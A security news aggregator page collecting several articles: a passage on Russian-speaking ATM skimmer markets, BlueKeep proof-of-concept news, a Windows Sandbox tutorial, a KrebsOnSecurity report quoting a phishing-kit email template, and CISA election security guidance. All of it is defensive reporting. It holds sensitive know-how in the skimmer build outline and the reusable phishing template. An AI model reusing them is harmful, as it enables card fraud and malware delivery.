Audio skimmers turn into a more potent kit when they are fitted with a camera that captures the card PIN number, becoming what is known as a video skimmer. The set is popular on the Russian-speaking underground forums because they can be installed quicker.

Flash audio skimmers are the upgraded variant of audio skimming gadgets and can cost more than $2,000.

“They use timing-calculating algorithms to “reed” the audio when the card is been scanned by the ATM, which allows them to decode a track in 1-2 seconds and immediately convert it into text format,” Boguslaskiy explains.

Furthermore, they can run uninterrupted for more than 20 hours and have a recording capacity of 500 dumps – that is full data from the tracks on the card’s magnetic stripe.

Smartphones and Bluetooth technology have also seen increased adoption among Russian skimmers. Boguslaskiy says that one actor offered instructions on how to build a skimming assembly using an off-the-shelf Bluetooth card reader and an Android smartphone.

BT009 card reader – priced $250-$400

Basically, the skimmer sends the information it captures to the smartphone. This way, the fraudster can touch the ATM only once and then sit in its vicinity to receive the dumps.

The researcher says that the trend is clearly against flash skimmers, a cheaper variant ($300-$500) that fits into the bezel of an ATM to read the cards. The reason is that they are not as efficient as the audio version.

Apart from being more vulnerable to radio jamming and jittering, they have a low reading rate of just up to 50% of the cards.

Dedicated shops

Sellers of card skimming ‘ware’ have dedicated websites where they offer all the kits necessary for slurping data on the card when clients put their plastic in an ATM.

Technological advancements give “lone-wolf” cybercriminals the opportunity to build card readers using off-the-shelf components. This offers them a ticket to enter private circles, some them in the business for more than 10 years.

“Russian-speaking real carding communities have traditionally been exclusive and tight-lipped regarding their skimming operations. Skimming developers form exclusive trusted underground criminal networks thereby connecting talented engineers, their trusted sellers, and wealthy carder buyers of such tools,” says Boguslaskiy.

Read Full Article

PoC Exploits for CVE-2019-0708 wormable Windows flaw released online

Read Full Article

Several security experts have developed PoC exploits for tracked as CVE-2019-0708 and dubbed BlueKeep.

Experts have developed several proof-of-concept (PoC) exploits for the recently patched Windows Remote Desktop Services (RDS) vulnerability tracked as CVE-2019-0708 and dubbed BlueKeep.

One of the PoC exploits could be used for remote code execution on vulnerable systems.

Microsoft Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including a Windows zero-day flaw and an RDS vulnerability that can be exploited to carry out -like attack.

The issue is a remote code execution flaw in Remote Desktop Services (RDS) that it can be exploited by an unauthenticated attacker by connecting to the targeted system via the RDP and sending specially crafted requests.

As explained by Microsoft, this vulnerability could be exploited by malware with capabilities, it could be exploited without user interaction, making it possible for malware to spread in an uncontrolled way into the target networks.

The vulnerability doesn’t affect Windows 8 and Windows 10, anyway previous versions are exposed to the risk of cyber attacks.

Microsoft also advised Windows Server users to block TCP port 3389 and enable Network Level Authentication to prevent any unauthenticated attacker from exploiting this vulnerability.

The issue poses a serious risk to organizations and industrial environments due to the presence of a large number of systems that could be reached via RDS.

Not all the exploits publicly released by the experts are fully working, come of them are able to trigger the vulnerability by don’t cause abny problem

Experts at the SANS Institute observed two partial exploits that are publicly available.

“Several security vendors stated publicly that they developed exploits internally that will at least trigger a denial of service condition (blue screen). Currently, there are at least two public partial exploits.” reads the blog post published by the SANS Institute, “One triggers the “vulnerable path” without triggering a blue screen or causing any other damage. It can be adjusted to play with the “channel” parameter to create normal and exploit traffic. The second one also triggers the vulnerability without any intended ill effect. The second exploit has been made available in the form of a stand-alone vulnerability scanner.”

Anyway, some researchers have created exploits to remotely execute code on vulnerable systems.

Read Full Article

Using the Windows Sandbox to Stay Safe Online

Read Full Article

Windows Sandbox

One of the more interesting features of Windows 10 version 1903, otherwise known as the May 2019 Update, is the Windows Sandbox. The Windows Sandbox is a Windows 10 virtual machine that can be quickly launched so you can test downloaded programs,browsers extensions, and suspect sites without risk of infecting your normal Windows operating system.

For those who are security conscious and do not want to deal with installing a dedicated virtual machine program like VirtualBox, Hyper-V, or VMWare, you can instead install Windows Sandbox for a very basic Windows 10 virtual machine.

While this feature brings terrific functionality to those who do not want to deal with a dedicated machine to test program, it could be improved, which we will discuss at the end of the article..

Installing the Windows Sandbox

Before you can install the Windows Sandbox, you first need to make sure your computer meets certain requirements. These are:

  • Windows 10 Pro or Enterprise build 1903 or later. There are ways to get it installed on Windows 10 Home, but those require a little extra work, which will not be covered in this article.
  • AMD64 architecture
  • Virtualization capabilities enabled in BIOS
  • At least 4GB of RAM (8GB recommended)
  • At least 1 GB of free disk space (SSD recommended)
  • At least 2 CPU cores (4 cores with hyperthreading recommended)

To install Windows Sandbox, simply follow these steps:

  1. Make sure you are using Windows 10 Pro or or Enterprise running version 1903 or later.
  2. Make sure CPU’s virtualization is enabled in the computer’s BIOS.
  3. Click the Start button and search for Windows Features. When it appears in the search results, click on the Turn Windows features on or off control panel result.

    Open Windows Features Control Panel

    Open Windows Features Control Panel
  4. When the Windows Features control panel opens, scroll down and put a check in the box next to Windows Sandbox and then press the OK button.

    Add Windows Sandbox Feature

    Add Windows Sandbox Feature
  5. After it has finished installing, Windows my ask you to reboot. Please allow it to do so.

The Windows Sandbox is now installed.

Using the Windows Sandbox

To use the Windows Sandbox, click on the Start button and search for Windows Sandbox. When it appears in the search results, click on it to launch the program.

When the Windows Sandbox loads for the first time, it may take a bit longer than normal as it generates the Windows 10 image it will use for the virtual machine.  Once loaded, you will be presented with a Window that contains a fully functional base Windows 10 installation as shown below.

The Windows Sandbox
The Windows Sandbox

With the Windows Sandbox running, you can easily transfer files that you want to be tested or copy text to and from its clipboard. To transfer a file from your main Windows operating system (the Host), simply right-click on a file you want to transfer and select Copy.

Copy file on the Host
Copy file on the Host

Now, go in the Windows Sandbox (the Guest) and right-click on the desktop and click on Paste to transfer the file from your Host.  

Transferring text between the Host machine and the Guest sandbox is easy as well, just copy text into the clipboard from either the main OS or the Sandbox and paste it into the other.

As an example of how the Windows Sandbox could be used, I just visited a site that stated I needed a Adobe Flash Player update. It looked a little fishy, so instead of running it on my main machine, I can fire up the Windows Sandbox and transfer the file there to test it.

I was lucky, because as you can see, this sure looks like an adware bundle rather than a Flash Player Update and is not something I would want to run on my normal computer. That’s because adware bundles have started to commonly install malware such as ransomware, miners, and password-stealing Trojans.

Windows Sandbox with Adware Bundle.
Windows Sandbox with Adware Bundle.

The good news is that anything you try out in the Windows Sandbox has no effect on your normal computer. So you can just try any program you download, malware or otherwise, or visit a web site and close the Sandbox when done with nothing to fear.

The next time you start it again, the Sandbox will be reset back to its default state so you can test more programs.

The Windows Sandbox is great, but could be better

Let me start out by saying I love the Windows Sandbox.

It is very easy to use, it allows users to quickly get a Windows 10 virtual machine up and running, and is accessible to users of all skill levels. This makes it very easy to test programs you download from the web or web browser extensions.

My only gripe is that it could be even better if we could easily use it to test malicious Office email attachments.

Malicious Word and Excel email attachments have become a very common method used to distribute malware such as ransomware, banking trojans, password-stealing Trojans, backdoors, downloaders, miners, and more.

Unfortunately, the Windows Sandbox only consists of a base operating system and no additional applications. This makes it impossible to test malicious Office documents such as Word and Excel documents without installing Office into the sandbox.

As the virtual machine is reset back to the default base image every time you close it, it can be a real pain if you want to use the Windows Sandbox to test email attachments.

It would be great if Microsoft included some way of testing malicious attachments. With that feature added, the Windows Sandbox would be incredibly useful for all users.

One other concern I have is that the Windows Sandbox can read the contents of your Host operating system’s clipboard. This means that if your Host has a password, or other sensitive information, saved to the clipboard, anything you run in the Sandbox will be able to access it. 

To fix this, it would be nice if we had easy controls to control how clipboard data is transferred.

Read Full Article

Legal Threats Make Powerful Phishing Lures

Read Full Article

Some of the most convincing email phishing and malware attacks come disguised as nastygrams from a law firm. Such scams typically notify the recipient that he/she is being sued, and instruct them to review the attached file and respond within a few days — or else. Here’s a look at a recent spam campaign that peppered more than 100,000 business email addresses with fake legal threats harboring malware.

On or around May 12, at least two antivirus firms began detecting booby-trapped Microsoft Word files that were sent along with some various of the following message:

{Pullman & Assoc. | Wiseman & Assoc.| Steinburg & Assoc. | Swartz & Assoc. | Quartermain & Assoc.} <[email protected]>

Hi,

The following {e-mail | mail} is to advise you that you are being charged by the city.

Our {legal team | legal council | legal departement} has prepared a document explaining the {litigation | legal dispute | legal contset}.

Please download and read the attached encrypted document carefully.

You have 7 days to reply to this e-mail or we will be forced to step forward with this action.

Note: The password for the document is 123456

The template above was part of a phishing kit being traded on the underground, and the user of this kit decides which of the options in brackets actually get used in the phishing message.

Yes, the spelling/grammar is poor and awkward (e.g., the salutation), but so is the overall antivirus detection rate of the attached malicious Word document. This phishing kit included five booby-trapped Microsoft Word documents to choose from, and none of those files are detected as malicious by more than three of the five dozen or so antivirus products that scanned the Word docs on May 22 — 10 days after they were spammed out.

According to both Fortinet and Sophos, the attached Word documents include a trojan that is typically used to drop additional malware on the victim’s computer. Previous detections of this trojan have been associated with ransomware, but the attackers in this case can use the trojan to install malware of their choice.

Also part of the phishing kit was a text document containing some 100,000 business email addresses — most of them ending in Canadian (.ca) domains — although there were also some targets at companies in the northeastern United States. If only a tiny fraction of the recipients of this scam were unwary enough to open the attachment, it would still be a nice payday for the phishers.

The law firm domain spoofed in this scam — wpslaw.com — now redirects to the Web site for RWC LLC, a legitimate firm based in Connecticut. A woman who answered the phone at RWC said someone had recently called to complain about a phishing scam, but beyond that the firm didn’t have any knowledge of the matter.

As phishing kits go, this one is pretty basic and not terribly customized or convincing. But I could see a kit that tried only slightly harder to get the grammar right and more formally address the recipient doing quite well: Legitimate-looking legal threats have a way of making some people act before they think.

Don’t be like those people. Never open attachments in emails you were not expecting. When in doubt, toss it out. If you’re worried it may be legitimate, research the purported sender(s) and reach out to them over the phone if need be. And resist the urge to respond to these spammers; doing so may only serve to encourage further “mailious” correspondence.

KrebsOnSecurity would like to thank Hold Security for a heads up on this phishing kit.

Read Full Article

ST19-002: Best Practices for Securing Election Systems

Read Full Article
Original release date: May 21, 2019 | Last revised: May 22, 2019


By adhering to cybersecurity best practices, election organizations—including state, local, tribal, and territorial (SLTT) governments—can improve the security of their election systems. The Cybersecurity and Infrastructure Security Agency (CISA) Hunt and Incident Response Team (HIRT) developed the best practices in this tip from lessons learned through engagements with SLTT governments, election stakeholders, and others. Organizations can implement these best practices, which harden enterprise networks and strengthen election infrastructure, at little or no cost. CISA’s election systems best practices cover the following topics:

Software and Patch Management

Implementing an enterprise-wide software and patch management program reduces the likelihood of an organization experiencing significant cybersecurity incidents. A software and patch management program includes the establishment of an enterprise-wide inventory list, which provides an organization with greater insight into the software running on its networks and associated vulnerabilities. The organization can then use the inventory list to help identify and mitigate the risks to its election-related information technology (IT) infrastructure. Mitigations often include implementing application whitelisting, a best practice. (See Implementing Application Whitelisting.)

CISA has observed a correlation between the absence of a patch management program and the partial or complete compromise of an enterprise network due to the presence of commodity malware. Commodity malware is widely available, has minimal or no customization, and used by a wide range of threat actors. A partial or complete compromise could lead to additional impacts, including ransomware infection and the theft of sensitive data, which may include personally identifiable information.

Failure to deploy patches in a timely manner can make an organization a target of opportunity, even for less sophisticated actors, increasing the risk of compromise. If an enterprise-wide patch management solution is too costly, an organization should consider enabling automatic updates. CISA recommends organizations subscribe to the National Cybersecurity Awareness System for alerts about security updates, threats, and vulnerabilities. This will assist organizations in maintaining situational awareness of critical vulnerabilities present in software widely used throughout their enterprise environments. It is vital to act quickly to apply patches, especially if there is an associated vulnerability being exploited.

Log Management

Retaining and adequately securing logs from both network devices and local hosts supports triage and remediation of cybersecurity events. An organization can analyze the logs to determine the impact of cybersecurity events and ascertain whether an incident has occurred.

Centralized Log Management

Organizations should set up centralized log management:

  • Forward logs from local hosts to a centralized log management server—often referred to as a security information and event management (SIEM) tool. CISA has observed threat actors attempting to delete local logs to remove on-site evidence of their activities. By sending logs to a SIEM tool, an organization can reduce the likelihood of malicious log deletion.
  • Correlate logs from both network and host security devices. By reviewing logs from multiple sources, an organization can better triage an individual event and determine its impact to the organization as a whole.
  • Review both centralized and local log management policies to maximize efficiency and retain historical data. CISA recommends that organizations retain critical logs for a minimum of one year, if possible.

Update PowerShell and Enable Advanced Logging

In addition to setting up centralized logging, organizations should ensure that instances of PowerShell are logging activity. PowerShell is a cross-platform command-line shell and scripting language that is a component of Microsoft Windows. CISA has observed threat actors, including APT actors, using PowerShell to hide their malicious activities.  

  • Update PowerShell instances to version 5.0 or later and uninstall all earlier PowerShell versions. Logs from PowerShell prior to version 5.0 are either non-existent or do not record enough detail to aid in enterprise monitoring and incident response activities.
  • Ensure PowerShell 5.0 instances have module, script block, and transcription logging enabled.

Network Segmentation

Organizations can limit the impact of a cybersecurity incident by enforcing network segmentation. Proper network segmentation is an effective security mechanism to prevent an intruder from propagating exploits or laterally moving around an internal network. On a poorly segmented network, intruders are able to extend their impact to control critical devices or gain access to sensitive data and intellectual property. Segregation separates network segments based on role and functionality. A securely segregated network can contain malicious occurrences, reducing the impact from intruders in the event that they have gained a foothold somewhere inside the network. (See Securing Network Infrastructure Devices.) During on-site engagements, CISA has observed organizations without effective network segmentation suffer commodity malware compromises of all Windows hosts in their environments.

Organizations should define their distinct organizational components (e.g., human resources, IT administration, demilitarized zone, elections) and create a separate Virtual Local Area Network (VLAN) for each component. Alternatively, if feasible, organizations should implement physical network segmentation for each component. CISA recommends that organizations restrict traffic between VLANs following the principle of least privilege. See below for additional guidance for protecting elections-specific VLANs.

Segment Elections-Related Hosts from the General User Network

  • Use dedicated servers and workstations for elections-related tasks. Organizations should never allow workstations with elections-related roles—such as submitting election results to a reporting server—to be used for general purpose computing, such as browsing the internet. Organizations should ensure up-to-date patching of workstations and servers dedicated to elections-related tasks.
  • Follow the principle of least privilege. Organizations should only allow elections-related VLANs to communicate with machines unrelated to elections on an as-needed basis. Other network traffic should be explicitly denied (e.g., by using a DENY/DENY ruleset).
  • Apply the appropriate technical controls (e.g., implement Group Policy Object [GPO] and firewall rules) to restrict general internet browsing from elections-related workstations and servers.

Block Suspicious Activity

Many organizations set their security devices to alert on suspicious activity instead of blocking it. When an organization does not block suspicious activity by default, it increases the likelihood of adverse events that allow an adversary to compromise IT resources. Organizations should follow best practices in disabling network protocols known to spread malware, such as Server Message Block version 1 (SMB v1). (See SMB Security Best Practices.)

Prevent Malware and Malicious Traffic

Organizations should perform the following actions to block malicious traffic and malware:

  • Enable security features. Many network appliances, cloud services, and security software (e.g., host intrusion prevention systems) have features—not enabled by default—that block malicious traffic. CISA recommends that organizations enable these features. Note: organizations should thoroughly test changes before implementing them in production environments.
  • Scan all incoming emails for malicious attachments and links prior to delivery, and quarantine emails, as necessary.
  • Train employees to recognize phishing attempts and ensure a process exists for reporting and triaging phishing emails.
  • Block macros from running in documents throughout enterprise. (See Who Needs to Exploit Vulnerabilities When You Have Macros? for more information.)
    • Before restricting macro-enabled documents, determine if any users need macro-enabled documents to perform their work functions. If macros are not used, disable them by GPO.
    • If blocking macro-enabled documents across an organization is too restrictive, consider alternative solutions, such as only allowing macro-enabled documents for specific users or blocking macros from running when received as email attachments from external users.

Disable SMB v1

In the course of recent engagements, CISA has observed threat actors using SMB v1 to spread malware across organizations. Based on this specific threat, CISA recommends organizations consider the following actions to protect their networks:

  • Disable SMB v1 internally on their network.
  • Block all versions of SMB at the network boundary by blocking Transmission Control Protocol (TCP) port 445 with related protocols on User Datagram Protocol ports 137–138 and TCP port 139.

Credential Management

Managing passwords and using strong passwords are important steps in preventing unauthorized access to databases, applications, and other election infrastructure assets. Multi-factor authentication (MFA), in particular, can help prevent adversaries from gaining access to an organization’s assets even if passwords are compromised through phishing attacks or other means. Threat actors have the capability to defeat single-factor authentication, especially when passwords are weak (e.g., common or trivial passwords) or—taking into account credential reuse—have been exposed in unrelated third-party breaches. CISA has published the following guidance to assist organization in achieving the goal of fully preventing unauthorized access:

  • Implement MFA to prevent unauthorized access, particularly by external users, including APT actors. (See Using Rigorous Credential Control to Mitigate Trusted Network Exploitation and Supplementing Passwords.) MFA requires users to present two or more credentials (e.g., a password and the use of a hardware token) at login to verify their identity before being granted access to a given system. Organizations should consider implementing MFA for voter registration, election night reporting, and associated enterprise IT systems.
  • Enforce password best practices, including the use of unique and complex passwords to access different systems and accounts. Accounts with additional privileges (e.g., administrator accounts) should have password requirements that are more stringent than those for standard users. (See Choosing and Protecting Passwords.)
  • If possible, use a local administration password solution. (See Local Administrator Password Solution.)

Establish a Baseline for Host and Network Activity

An organization’s IT personnel are critical in determining what is and is not normal and expected host or network activity. With the appropriate tools, IT personnel are well positioned to determine whether observed anomalous activity warrants further investigation. During on-site engagements, CISA uses the following metrics to establish a baseline for expected network- and host-based activity:

Network Baseline

  • Specific metrics should include expected bandwidth usage for
    • The organization,
    • Each user (if possible),
    • Remote access,
    • Ports,
    • Protocols, and
    • File types.
  • Organizations should consider variables such as the time of day traffic occurs, i.e., remote access is more suspicious occurring at 1 a.m. than during standard business hours.
  • Including additional metrics—such as the destination of network traffic and the destination Internet Protocol (IP) address’s geographic location—establishes a more detailed baseline.
  • Once a baseline is established, an organization should review the results to determine if they align with industry best practices. (See Handbook for Elections Infrastructure Security.)
  • Organizations should compare their baseline traffic with the rules from their boundary firewalls to ensure that the rules are acting as intended and align with industry best practices.

Host Baseline

  • Organizations can establish a baseline by creating a “gold image” for workstations and servers. A gold image contains an organization’s standard set of necessary, trusted applications installed for the set of systems for which it is designed. Once created, the organization should document the gold image’s configuration. Organizations should also document approved variations from the gold image, such as tools used by the organization’s network or security teams. Examples of configuration information that may be useful in identifying anomalous activity include
    • Hashes of critical operating system files;
    • Software used for remote host access (e.g., a Virtual Private Network client);
    • An organization-wide approved software list, which can help determine if detected software is not approved for the organization; and Information on configurations and settings that can be used to automatically launch software after a reboot, including services, scheduled tasks, and autorun programs.  
  •  In addition to reviewing files on a system, organizations should review the location of file installation and the validity of the files’ digital certificate, if possible.

Organization-Wide IT Guidance and Policies

Developing and maintaining guidance and policies targeted to specific situations and that assist in implementing best practices throughout the organization benefits an organization’s IT ecosystem. Guidance and policies that can significantly benefit an organization’s cyber hygiene include

  • A cybersecurity incident response plan and corresponding communications plan (see Incident Handling Overview for Election Officials, Handbook for Elections Infrastructure Security, and Election Cyber Incident Communications Plan Template);
    • At a minimum, include
      • Roles and responsibilities of the parties in regard to the plans;
      • 24/7 contact information for the parties with critical roles;
      • Incident severity thresholds and associated role-based actions taken at those thresholds;
      • A policy establishing a user’s responsibility to notify IT personnel of an IT security event; and
      • Guidance that helps determine when the organization should notify external parties, such as CISA, the Federal Bureau of Investigation, or the Election Infrastructure Information Sharing and Analysis Center (EI-ISAC) (see Election Infrastructure Subsector Communications Protocol, EI-ISAC Formalized Notification Process, both available from CISA upon request, and Cyber Incident Reporting Unified Message).
  • Patch management policies;
  • Password management policies; and
  • An approved software list.

Guidance and policies like these help formalize expectations for users and IT personnel. Organizations should formally document any exceptions to official guidance and policies.

CISA On-Site Engagement Preparation

CISA provides expert intrusion analysis and mitigation guidance to clients who lack in-house capability or require additional assistance with responding to a cyber incident. CISA supports federal departments and agencies, state and local governments, the private sector (industry and critical infrastructure asset owners and operators), academia, and international organizations.

Before CISA can approve an organization’s Request for Technical Assistance (RTA) to provide on-network assistance to SLTT government agencies as part of a hunt or incident response, CISA requires proof that the organization has implemented login consent banners that appear on the screens of all servers and workstations accessed by the organization’s staff and within the scope of the assistance. This login consent banner cannot conflict with other IT resource policies, procedures, or trainings. In many situations, CISA has successfully helped government organizations update their banners in a way that allows CISA assistance. CISA cannot approve deployment to an on-site SLTT engagement involving on-network assistance unless the RTA and login consent banners are approved. For more information regarding consent banners, see the Election Infrastructure Questionnaire.

CISA also strongly recommends that organizations maintain current internal documentation related to the Election Infrastructure Questionnaire. CISA developed the questionnaire to assist organizational documentation of election infrastructure cybersecurity posture and to identify key interdependencies.

Notice and Consent Banners for Computer Systems

This section identifies recommended elements in computing system notice and consent banners and provides an example banner. This section does not include legal advice, and the information it contains is not guaranteed to be accurate or complete. Anyone reviewing or developing a notice and consent banner should consider consulting an attorney and should note that laws can change rapidly, differ from jurisdiction to jurisdiction, and can be subject to various interpretations by various entities. Further, notice and consent banners can require tailoring based on the specific circumstances and legal jurisdiction at issue. The elements or the examples may be inadvisable depending on the entity or situation. Applicable laws may include the Fourth Amendment to the U.S. Constitution, any similar provisions in State Constitutions, and relevant federal- and state-level statutes.

Notice and Consent Banner Elements

  1. The banner expressly covers monitoring of data and communications in transit rather than just accessing data at rest.
    • Example: “You consent to the unrestricted monitoring, interception, recording, and searching of all communications and data transiting, traveling to or from, or stored on this system.”
  2. The banner provides that information in transit or stored on the system may be disclosed to any entity, including to government entities.
    • Example: “You consent, without restriction, to all communications and data transiting, traveling to or from, or stored on this system being disclosed to any entity, including to government entities.”
  3. The banner states that monitoring will be for any purpose.
    • Example: “…at any time and for any purpose.”
  4. The banner states that monitoring may be done by the entity or any person or entity authorized by the entity.
    • Example: “…monitoring or disclosure to any entity authorized by [ENTITY].”
  5. The banner explains to users that they have “no reasonable expectation of privacy” regarding communications or data in transit or stored on the system.
    • Example: “You are acknowledging that you have no reasonable expectation of privacy regarding your use of this system.”
  6. The banner clarifies that the given consent covers personal use of the system (such as personal emails or websites, or use on breaks or after hours) as well as official or work-related use.
    • Example: “…including work-related use and personal use without exception….”
  7. The banner is definitive about the fact of monitoring, rather than being conditional or speculative.
    • Example: “…will be monitored…”
  8. The banner expressly obtains consent from the user and does not merely provide notification.
    • Note: click-through banners can be best because they force the user to interact with the language.
    • Note: supporting processes should generally also preserve/provide evidence of the user’s agreement to the terms.
    • Example: “By using this system, you are acknowledging and consenting to…”
    • Example: “By clicking [ACCEPT] below…you consent to…”
  9. Nothing in the remainder of the banner or associated policies, agreements, training, etc., is inconsistent with, or otherwise undercuts, the elements of the banner.

Example Banner

By clicking [ACCEPT] below you acknowledge and consent to the following:

All communications and data transiting, traveling to or from, or stored on this system will be monitored. You consent to the unrestricted monitoring, interception, recording, and searching of all communications and data transiting, traveling to or from, or stored on this system at any time and for any purpose by [the ENTITY] and by any person or entity, including government entities, authorized by [the ENTITY]. You also consent to the unrestricted disclosure of all communications and data transiting, traveling to or from, or stored on this system at any time and for any purpose to any person or entity, including government entities, authorized by [the ENTITY]. You are acknowledging that you have no reasonable expectation of privacy regarding your use of this system. These acknowledgments and consents cover all use of the system, including work-related use and personal use without exception.

Additional Resources

Elections-Specific Guidance

CISA Election Security Information:
https://www.dhs.gov/cisa/election-security

Incident Handling for Elections:
https://www.dhs.gov/sites/default/files/publications/Incident%20Handling%20Elections%20Final%20508.pdf

Election Cyber Incident Communications Plan Template for State and Local Officials:
https://www.belfercenter.org/publication/election-cyber-incident-communications-plan-template

Election Infrastructure Questionnaire:
https://www.us-cert.gov/sites/default/files/publications/Elections%20Infrastructure%20Questionnaire.pdf  

Securing Voter Registration Data:
https://www.us-cert.gov/ncas/tips/ST16-001

Center for Internet Security (CIS) Handbook for Elections Infrastructure Security:
https://www.cisecurity.org/elections-resources-best-practices/

Patch Management Best Practices

Understanding Patches and Software Updates:
https://www.us-cert.gov/ncas/tips/ST04-006

National Institute of Standards and Technology (NIST) Special Publication (SP) 800-40 Rev. 3: Guide to Enterprise Patch Management Technologies:
https://csrc.nist.gov/publications/detail/sp/800-40/rev-3/final

CIS Top 20 Security Controls:
https://www.cisecurity.org/controls/

Ransomware Best Practices

Protecting Against Ransomware:
https://www.us-cert.gov/ncas/tips/ST19-001

Password Best Practices

Choosing and Protecting Passwords:
https://www.us-cert.gov/ncas/tips/ST04-002

Supplementing Passwords:
https://www.us-cert.gov/ncas/tips/ST05-012

NIST SP 800-63B Digital Identity Guidelines Authentication and Lifecycle Management:
https://pages.nist.gov/800-63-3/sp800-63b.html

Enterprise Best Practices

Securing Enterprise Wireless Networks:
https://www.us-cert.gov/ncas/tips/ST18-247

Website Security:
https://www.us-cert.gov/ncas/tips/ST18-006

Note: due to variances among enterprise networks and associated election infrastructure, organizations should not consider these best practices a prescriptive solution for all cybersecurity risks.

References


Authors:


This product is provided subject to this Notification and this Privacy & Use policy.

Read Full Article